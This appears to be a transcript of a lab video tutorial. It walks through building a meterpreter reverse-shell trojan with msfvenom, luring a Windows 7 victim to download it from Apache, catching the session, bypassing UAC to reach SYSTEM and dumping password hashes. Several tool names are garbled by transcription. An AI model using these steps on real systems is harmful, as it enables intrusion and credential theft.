escalating privileges by exploiting client-side vulnerability. In this scenario, I have two machines. One machine is Kali Linux operating system and one machine has Windows 7 operating system. Windows 7 machine will work as a victim machine and it has IP address 192.168.159.245. And this Kali machine will work as attacker's machine and it has IP address 192.168.159.246. In this scenario, both machines are working in same local area network. You can see Kali Linux and Windows 7 are both connected with the common switch. Kali Linux is also working as a web server. I will install Apache service in Kali Linux operating system because in this demonstration I will create one Trojan into Kali Linux operating system and I will put Trojan into Apache and Apache will work as web server and think attacker will send this web server's link to the victim machine like by chat or by message or by mail, etc. And victim convinced to click on that link and that link will ask for download this Trojan virus. And when victim click on Trojan and download it and run it, this Windows 7 machine will establish reverse connection to this Kali Linux operating system by this Trojan virus. By this malicious program means when victim run this Trojan into Windows 7, this malicious program will establish connection with the attacker's machine and attacker will notify after establishing session with the Windows 7 operating system or victim machine's operating system. And after establishing session, attacker will take control over this session and try to gather privileges, information of the victim machine's username information, and attacker also can take control over the whole operating system. So in this scenario, I will show you how you can create Apache web server in Kali Linux operating system and how you can start and stop Apache service and how you can create Trojan using payload service in Kali Linux operating system and how we can control over the target machine like Windows operating system using Meet-Operator service in Kali Linux operating system. So let's begin. Here I have Kali Linux operating system and it has IP address 192.168.159.246 and here I have Windows 7 operating system and it has IP address 192.168.159.245. Now, let me create Trojan first. Using MS Venom utility in Kali Linux, define Windows meter predictor reverse underscore TCP. Define localhost IP address. IP address is 192.168.159.246. It is attacker's IP address and attacker's IP address is 246. And also define local port. And local port will be 5566. Use -F for file type. File type will be exe. Where do you want to generate this Trojan? I will generate into desktop folder as a crack.exe. Make sure all the spellings are correct. Now let me list desktop folder crack.exe is successfully generated. Now we just need to start PostgreSQL SQL service. Let me check status of the Postgres. It is inactive. So first, start it. Check with the status command. It is working fine. Now let me create folder in www with the name of share. It is home directory folder of web server. So now we need to copy Trojan into www share folder. Let me check status of the Apache. It is inactive. So first start it. Here you can see it is active. Now let me open Firefox. Let me check with the path share. It is not working. Let me check Apache. Apache is working fine. So we just need to go to the etc Apache sites available 000-default.conf, and we just need to delete document root folder and just restart it. And go to the Firefox and define path, and it's working fine. Let me check with the Windows 7 also. And it is working fine. Now we just need to open MSF console. It can take few seconds. Define path, use, exploit, multi-handler. Define localhost IP address 192.168.159.246. Also define local port. Local port was 5566. And now just read to exploit command. Use capital Z. And just run crack.exe. Here you can see session is opened with the remote command, remote machine. Here you can see sessions information. This is Kali Linux IP address, and this is Windows 7's IP address. You can take control over this session using session space -i1. Now we just need to check UID information of the remote machine using get UID. Now we need to dump password information, hash dump information of the remote machine. Oh, command is failed to escalate privileges. Let me check with the gate system. Define session number. Same command is failed to escalate privileges and return error like access is denied. So as per result, it is evident that the security configuration of the target machine is blocking us from gaining unrestricted access to the machine. Now we will try to bypass the user account control setting that is blocking us from gaining unrestricted access to the machine. So now let me use background command. This command will background current MetaBreeder session, and we just need to use exploit Windows local and bypass user access control UAC. Just run show options command. Here you can see session is yes. So set session 1. Now we need to set payload. Windows MetaBreeder reverse underscore TCP. Use show options command. Here you can see localhost is not defined. Let me define localhost 159.246. As session establishment, you can see it is listening on 5566. So let me configure local ports also. Set carol port 5566. And just we need to run exploit. Here you can see bypass UAC can bypass this setting and session is established get UID. Here you can see user informations, get system, FN1, got system. It's working. You can see in memory we are working as admin. Now let me check get UID, and here you can see username informations has been changed. Now let me run hash dump also. It is working fine. Here you can see these are the hash dump of the users of remote machines. So hope you understand how we can escalate privileges by exploiting client-side vulnerabilities. So thank you for watching this video.